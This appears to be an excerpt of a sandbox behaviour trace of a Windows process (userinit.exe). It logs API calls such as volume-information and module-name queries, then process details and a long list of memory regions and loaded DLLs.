[0110.565] VirtualAlloc (lpAddress=0x2960000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2960000
[0110.566] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.566] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.566] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.566] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.566] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.566] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.566] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.567] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.567] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.567] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.567] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.567] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.567] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.567] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.567] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.568] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.568] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24ea7c, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24ea90, lpMaximumComponentLength=0x24ea8c, lpFileSystemFlags=0x24ea88, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24ea90*=0x90c08a66, lpMaximumComponentLength=0x24ea8c*=0xff, lpFileSystemFlags=0x24ea88*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0110.568] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e980, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0110.568] GetSystemDefaultLangID () returned 0x120409
[0110.568] VerLanguageNameA (in: wLang=0x409, szLang=0x24ea34, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0110.569] ExitProcess (uExitCode=0x0)
Thread:
id = 239
os_tid = 0xfb4
Thread:
id = 240
os_tid = 0xfb8
Process:
id = "33"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be720"
os_pid = "0xfa4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3145
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3146
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3147
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3148
start_va = 0x90000
end_va = 0xcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 3149
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 3150
start_va = 0xfe0000
end_va = 0xfe8fff
entry_point = 0xfe0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 3151
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3152
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3153
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 3154
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 3155
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 3156
start_va = 0x1f0000
end_va = 0x2effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 3157
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3158
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3159
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3160
start_va = 0xd0000
end_va = 0x136fff
entry_point = 0xd0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3161
start_va = 0x610000
end_va = 0x61ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 3162
start_va = 0x6ced0000
end_va = 0x6cf53fff
entry_point = 0x6ced0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3163
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 3164
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3165
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3166
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3167
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3168
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3169
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3170
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3171
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3172
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3173
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3174
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 3175
start_va = 0x2f0000
end_va = 0x3b7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002f0000"
filename = ""
Region:
id = 3176
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3177
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3178
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 3179
start_va = 0x50000
end_va = 0x50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 3180
start_va = 0x190000
end_va = 0x19ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 3181
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 3182
start_va = 0xff0000
end_va = 0x1beffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ff0000"
filename = ""
Region:
id = 3183
start_va = 0x620000
end_va = 0x71ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 3184
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 3185
start_va = 0x720000
end_va = 0x92ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000720000"
filename = ""
Region:
id = 3194
start_va = 0x720000
end_va = 0x7fefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000720000"
filename = ""
Region:
id = 3195
start_va = 0x8f0000
end_va = 0x92ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000008f0000"
filename = ""
Region:
id = 3196
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 3208
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 3209
start_va = 0x930000
end_va = 0xa3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3210
start_va = 0x1bf0000
end_va = 0x251ffff
entry_point = 0x1bf0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 3211
start_va = 0x70000
end_va = 0x76fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 3212
start_va = 0x80000
end_va = 0x81fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 3213
start_va = 0xa40000
end_va = 0xe32fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a40000"
filename = ""
Region:
id = 3214
start_va = 0x580000
end_va = 0x5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 3215
start_va = 0xe40000
end_va = 0xf4cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e40000"
filename = ""
Region:
id = 3216
start_va = 0x2520000
end_va = 0x261ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 3218
start_va = 0x2620000
end_va = 0x281ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002620000"
filename = ""
Region:
id = 3221
start_va = 0x800000
end_va = 0x880fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3226
start_va = 0x930000
end_va = 0x9b2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3227
start_va = 0xa00000
end_va = 0xa3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a00000"
filename = ""
Region:
id = 3228
start_va = 0x800000
end_va = 0x884fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3229
start_va = 0x930000
end_va = 0x9b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3230
start_va = 0x800000
end_va = 0x888fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3235
start_va = 0x930000
end_va = 0x9bafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3236
start_va = 0x800000
end_va = 0x88cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3237
start_va = 0x930000
end_va = 0x9befff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3238
start_va = 0x800000
end_va = 0x890fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3242
start_va = 0x930000
end_va = 0x9c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3243
start_va = 0x800000
end_va = 0x894fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3244
start_va = 0x930000
end_va = 0x9c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3248
start_va = 0x800000
end_va = 0x898fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3249
start_va = 0x930000
end_va = 0x9cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3250
start_va = 0x800000
end_va = 0x89cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3251
start_va = 0x930000
end_va = 0x9cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3255
start_va = 0x800000
end_va = 0x8a0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3256
start_va = 0x930000
end_va = 0x9d2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3257
start_va = 0x800000
end_va = 0x8a4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3261
start_va = 0x930000
end_va = 0x9d6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3262
start_va = 0x800000
end_va = 0x8a8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3263
start_va = 0x930000
end_va = 0x9dafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3267
start_va = 0x800000
end_va = 0x8acfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3268
start_va = 0x930000
end_va = 0x9defff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3269
start_va = 0x800000
end_va = 0x8b0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3272
start_va = 0x930000
end_va = 0x9e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3273
start_va = 0x800000
end_va = 0x8b4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3274
start_va = 0x930000
end_va = 0x9e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3278
start_va = 0x800000
end_va = 0x8b8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3279
start_va = 0x930000
end_va = 0x9eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3280
start_va = 0x800000
end_va = 0x8bcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3284
start_va = 0x930000
end_va = 0x9eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3285
start_va = 0x800000
end_va = 0x8c0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3289
start_va = 0x930000
end_va = 0x9f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3290
start_va = 0x800000
end_va = 0x8c4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3291
start_va = 0x930000
end_va = 0x9f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3294
start_va = 0x800000
end_va = 0x8c8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3295
start_va = 0x930000
end_va = 0x9fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3298
start_va = 0x800000
end_va = 0x8ccfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3299
start_va = 0x930000
end_va = 0x9fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 3302
start_va = 0x800000
end_va = 0x8d0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3303
start_va = 0x2820000
end_va = 0x28f2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3304
start_va = 0x800000
end_va = 0x8d4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3308
start_va = 0x2820000
end_va = 0x28f6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3309
start_va = 0x800000
end_va = 0x8d8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3312
start_va = 0x2820000
end_va = 0x28fafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3313
start_va = 0x800000
end_va = 0x8dcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3314
start_va = 0x2820000
end_va = 0x28fefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3317
start_va = 0x800000
end_va = 0x8e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3318
start_va = 0x2820000
end_va = 0x2902fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3321
start_va = 0x800000
end_va = 0x8e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3322
start_va = 0x2820000
end_va = 0x2906fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3325
start_va = 0x800000
end_va = 0x8e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3326
start_va = 0x2820000
end_va = 0x290afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3330
start_va = 0x800000
end_va = 0x8ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 3331
start_va = 0x2820000
end_va = 0x290efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3332
start_va = 0x2910000
end_va = 0x2a00fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 3335
start_va = 0x2a10000
end_va = 0x2b02fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a10000"
filename = ""
Region:
id = 3337
start_va = 0x2820000
end_va = 0x2914fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3338
start_va = 0x2920000
end_va = 0x2a16fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 3339
start_va = 0x2820000
end_va = 0x2918fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3343
start_va = 0x2920000
end_va = 0x2a1afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 3344
start_va = 0x2820000
end_va = 0x291cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3347
start_va = 0x2920000
end_va = 0x2a1efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 3348
start_va = 0x2a20000
end_va = 0x2b20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a20000"
filename = ""
Region:
id = 3351
start_va = 0x2820000
end_va = 0x2922fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3352
start_va = 0x2930000
end_va = 0x2a34fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 3355
start_va = 0x2820000
end_va = 0x2926fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3356
start_va = 0x2930000
end_va = 0x2a38fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 3359
start_va = 0x2820000
end_va = 0x292afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3360
start_va = 0x2930000
end_va = 0x2a3cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 3363
start_va = 0x2820000
end_va = 0x292ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 3365
start_va = 0x2a40000
end_va = 0x2b52fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 3366
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 3367
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 3368
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 3369
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
